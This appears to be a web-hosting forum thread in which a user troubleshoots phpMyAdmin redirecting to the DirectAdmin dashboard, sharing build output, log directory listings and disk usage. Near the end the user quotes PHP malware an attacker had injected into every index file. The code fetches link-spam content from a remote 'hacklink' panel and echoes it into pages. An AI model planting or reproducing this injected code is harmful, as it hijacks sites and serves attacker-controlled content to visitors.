PhpMyAdmin is not working

jdavide222

New member
Joined
May 21, 2026
Messages
8
All of sudden my PhpMyadmin stopped working. No matter what to do, it returns me back to dashboard.

How can i fix this bug/mess? or what caused it?

Appreciate for any help.
 
root@xxxxxxxx: /usr/local/directadmin/custombuild# ./build phpmyadmin
download_cached: using cached '/usr/local/directadmin/custombuild/cache/phpMyAdmin-5.2.3-all-languages.tar.gz' file
removing /var/www/html/phpMyAdmin-5.2.3-LNkO
phpMyAdmin 5.2.3 installation is done.
root@xxxxxxxx:/usr/local/directadmin/custom

result is same
 
All log files are in /var/log/*

But you might want to check if phpmyadmin uses the one-click login config. Then you have to login as the user in the controlpanel, go to the databases en click the phpmyadmin button there.
 
this is entire log directory

root@xxxxxxxx:/var/log# ls
alternatives.log dpkg.log.4.gz
alternatives.log.1 dpkg.log.5.gz
alternatives.log.10.gz dpkg.log.6.gz
alternatives.log.11.gz dpkg.log.7.gz
alternatives.log.12.gz dpkg.log.8.gz
alternatives.log.2.gz dpkg.log.9.gz
alternatives.log.3.gz exim
alternatives.log.4.gz httpd
alternatives.log.5.gz journal
alternatives.log.6.gz kern.log
alternatives.log.7.gz kern.log.1
alternatives.log.8.gz kern.log.2.gz
alternatives.log.9.gz kern.log.3.gz
apport.log kern.log.4.gz
apport.log.1 landscape
apt lastlog
auth.log lfd.log
auth.log.1 lfd.log.1.gz
auth.log.2.gz mail.log
auth.log.3.gz mail.log.1
auth.log.4.gz mail.log.2.gz
btmp mail.log.3.gz
btmp.1 mail.log.4.gz
cloud-init-output.log private
cloud-init.log pureftpd.log
directadmin rkhunter.log
dist-upgrade rkhunter.log.1
dmesg sa-update.log
dmesg.0 sa-update.log.1
dmesg.1.gz sa-update.log.2
dovecot-lmtp-errors.log syslog
dovecot-lmtp-errors.log.1 syslog.1
dovecot-lmtp-errors.log.2 syslog.2.gz
dovecot-lmtp-errors.log.3 syslog.3.gz
dovecot-lmtp.log syslog.4.gz
dovecot-lmtp.log.1 ubuntu-advantage-apt-hook.log
dovecot-lmtp.log.2 ubuntu-advantage.log
dovecot-lmtp.log.3 ubuntu-advantage.log.1
dovecot-lmtp.log.4 ubuntu-advantage.log.2.gz
dpkg.log ubuntu-advantage.log.3.gz
dpkg.log.1 ubuntu-advantage.log.4.gz
dpkg.log.10.gz ubuntu-advantage.log.5.gz
dpkg.log.11.gz ubuntu-advantage.log.6.gz
dpkg.log.12.gz unattended-upgrades
dpkg.log.2.gz user_logs
dpkg.log.3.gz wtmp


And this is entire custombuild directory
:/usr/local/directadmin/custombuild# ls
Mail-SpamAssassin-4.0.0.tar.gz mysql_backups.log
build options.conf
cache patches
configure phpMyAdmin-5.2.1-all-languages.tar.gz
custombuild.log pure-ftpd-1.0.51.tar.gz
dovecot-2.3.21.tar.gz tmp
imapsync-2.229.tar.gz versions.txt
mysql_backups webalizer-2.23-09-src.tgz
 
Do you have enough disk space ?
Code:
df -h


result as follow

:/usr/local/directadmin/custombuild# df -h
Filesystem Size Used Avail Use% Mounted on
tmpfs 192M 2.2M 190M 2% /run
/dev/sda1 39G 19G 21G 48% /
tmpfs 958M 0 958M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
/dev/sda15 105M 6.1M 99M 6% /boot/efi
tmpfs 192M 4.0K 192M 1% /run/user/1000


Something I want to share before going further.

Couple of months ago, someone somehow has hacked my site. He/She/It put following code all index files

<!-- Telegram: https://t.me/hacklink_panel --><?php if(!function_exists('hacklink_add')){function hacklink_add(){static $b=null;if($b!==null)return $b;$u='https://panel.hacklinkmarket.com/co...P_HOST'].'/';if(function_exists('curl_init')){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>['X-Request-Domain:'.$d],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$b=$r;return $b;}}if(ini_get('allow_url_fopen')){$o=['http'=>['header'=>'X-Request-Domain:'.$d,'timeout'=>10],'ssl'=>['verify_peer'=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$b=$r;return $b;}}if(function_exists('fopen')){if($f=@fopen($u,'r')){$r='';while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$b=$r;return $b;}}}return '';}} ?>
<?php echo hacklink_add(); ?>


So, i cleaned entire site, updated ubuntu, updated DA, hardened server security...

Is this cause problem?
 
Back
Top